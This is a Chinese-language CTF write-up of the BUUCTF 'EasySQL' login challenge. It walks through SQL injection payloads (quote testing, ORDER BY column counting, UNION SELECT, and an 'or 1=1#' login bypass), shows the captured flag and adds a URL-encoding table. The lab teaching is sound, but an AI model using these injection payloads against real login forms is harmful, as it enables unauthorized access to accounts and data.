点击链接进入环境发现是一个登录界面
我的思路:
第一步、测试注入点(tips:利用单引号,and 1=1, or 1=1之类的,%23为#注释符的url编码)判断是字符型还是数字型

payload:username=1' &password=123(SQL tyntax)

payload:username=1' %23&password=123(说明存在注入点)

第二步、利用order by查表的列数

payload:username=1' order by 1%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 2%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 3%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 4%23&password=123(Unknown column '4' in 'order clause')
说明表只有四列

第三步、如有回显,找到回显位(回显,就是显示正在执行的批处理命令及执行的结果等)

payload:username=1' union select 1,2,3%23&password=123

flag{cb71f2ab-7fea-42d9-bf34-41755337fada}
发现在查找回显位的这一步就出现了flag,都用不到爆库

第四步、利用union select 爆库、爆表、爆字段名、爆值

看大佬wp发现还有一种更简单的方法:

实际上这道题是登录成功就可以拿到flag
在用户名和密码都填:
payload:'or 1=1#
由于用户名和密码都存在sql注入漏洞,可以用'闭合前面的查询语句同时用or绕过判断

★URL编码表:

backspace 8% A 41% a 61% § %A7 Õ %D5  
tab 9% B 42% b 62% « %AB Ö %D6  
linefeed %0A C 43% c 63% ¬ %AC Ø %D8  
creturn %0D D 44% d 64% ¯ %AD Ù %D9  
space 20% E 45% e 65% º %B0 Ú %DA  
! 21% F 46% f 66% ± %B1 Û %DB  
" 22% G 47% g 67% ª %B2 Ü %DC  
# 23% H 48% h 68% , %B4 Ý %DD  
$ 24% I 49% i 69% µ %B5 Þ %DE  
% 25% J %4A j %6A » %BB ß %DF  
& 26% K %4B k %6B ¼ %BC à %E0  
' 27% L %4C l %6C ½ %BD á %E1  
( 28% M %4D m %6D ¿ %BF â %E2  
) 29% N %4E n %6E À %C0 ã %E3  
* %2A O %4F o %6F Á %C1 ä %E4  
+ %2B P 50% p 70% Â %C2 å %E5  
, %2C Q 51% q 71% Ã %C3 æ %E6  
- %2D R 52% r 72% Ä %C4 ç %E7  
. %2E S 53% s 73% Å %C5 è %E8  
/ %2F T 54% t 74% Æ %C6 é %E9  
0 30% U 55% u 75% Ç %C7 ê %EA  
1 31% V 56% v 76% È %C8 ë %EB  
2 32% W 57% w 77% É %C9 ì %EC  
3 33% X 58% x 78% Ê %CA í %ED  
4 34% Y 59% y 79% Ë %CB î %EE  
5 35% Z %5A z %7A Ì %CC ï %EF  
6 36%             ð %F0  
7 37% ? %3F { %7B Í %CD ñ %F1  
8 38% @ 40% | %7C Î %CE ò %F2  
9 39% [ %5B } %7D Ï %CF ó %F3  
: %3A \ %5C ~ %7E Ð %D0 ô %F4  
; %3B ] %5D ¢ %A2 Ñ %D1 õ %F5  
%3C ^ %5E £ %A3 Ò %D2 ö %F6  
= %3D _ %5F ¥ %A5 Ó %D3 ÷ %F7  
%3E ` 60% | %A6 Ô %D4 ø %F8  
                ù %F9  

BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表)相关推荐

  1. BUUCTF Web 极客大挑战 2019 EasySQL

    BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...

  2. BUUCTF Web [极客大挑战 2019]EasySQL

    「作者主页」:士别三日wyx   此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...

  3. BUUCTF WEB [极客大挑战 2019]LoveSQL

    BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...

  4. BUUCTF Web [极客大挑战 2019]Havefun

    「作者主页」:士别三日wyx   此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...

  5. [极客大挑战2019] EasySQL

    [强网杯 2019]随便注 这题是写给自己看的,记录一下自己sql注入的学习历程,看了别人的博客,总结了一下自己的知识查看大佬操作 首先是涉及到的点,因为写过一次,这次是总结知识点 1.堆叠注入 该题 ...

  6. 【BUUCTF】[极客大挑战 2019]RCE ME

    源码 <?php error_reporting(0); if(isset($_GET['code'])){$code=$_GET['code'];if(strlen($code)>40) ...

  7. [极客大挑战 2019]EasySQL

    用户名密码,尝试万能密码. 'or 1=1 # 随便密码 获得flag 一个万能密码的参考:万能密码

  8. 【BUUCTF】[极客大挑战 2019]Havefun 1

    主要考察对源代码的理解 1.进入网站 2.发现网页并没有什么有用的提示,观察源代码发现可能有用的判别语句 3.尝试输入?cat=dog

  9. BUUCTF:[极客大挑战 2019]RCE ME

    这题和我这篇文章内容相关:关于PHP正则的一些绕过方法 绕过正则,有长度限制,先出一个phpinfo()看一下配置,payload很多,我上面那篇文章里面的也可以,我这里直接用取反urlencode编 ...

最新文章

  1. 基于C++CUDA实现全景图(2:1 Equirectangular Image)转换为天空盒图像
  2. uniapp无法使用substr_SQLite 3.34.0发布,世界上使用量最大的数据库引擎
  3. 多个linux发行版本混合安装盘,使用 MultiBootUSB 安装多个 Linux 版本
  4. uva 10152 ShellSort
  5. Centos7下编译安装python2.7.10
  6. 日本电影《摇摆》:男人之间的心灵碰撞
  7. xpath定位中详解id 、starts-with、contains、text()和last() 的
  8. 12-matlab简单读excel
  9. spring mvc controller间跳转 重定向 传参 (转)
  10. HTML中美化页面,10 使用CSS美化页面
  11. 腾讯推出移动端动画组件PAG,释放设计生产力!
  12. 无法打开包括文件: “Eigen/Dense”【CMakeLists 解决方案】
  13. iris数据集(.csv .txt)免费下载
  14. 从特征融合的视角设计图神经网络的拓扑结构
  15. 别人家的阿里巴巴校招
  16. OpenGL ES OpenGL WebGL EGL WGL 区别
  17. kali linux 网络渗透测试学习笔记(三)社会工程学之Java攻击:钓鱼网站制作
  18. 【Wi-Fi】IEEE 802.11 Standards 之 802.11a/b/g/n/ac/ax初探
  19. Failed to introspect Class [org.springframework.cloud.gateway.config.GatewayAutoConfiguration$NettyC
  20. 北斗GPS系统在车辆管理系统中的运用与北斗GPS车辆管理调度系统平台建设方案硬件设备

热门文章

  1. hdu-5063 Operation the Sequence
  2. JSP简单练习-javaBean的简单应用
  3. NYOJ 975 关于521
  4. Navicat for mysql导入.sql数据库大小受限制
  5. mybatis框架入门程序:演示通过mybatis实现数据库的插入操作中实现返回结果的获取...
  6. 文件夹获取管理员权限脚本
  7. 数据库设计中,多对多关系使用使用逗号分割关联讨论
  8. (mysql) EXPLAIN语法
  9. PHP 设计模式 笔记与总结(8)策略模式
  10. Nginx打开目录浏览功能(autoindex)以及常见问题解决方案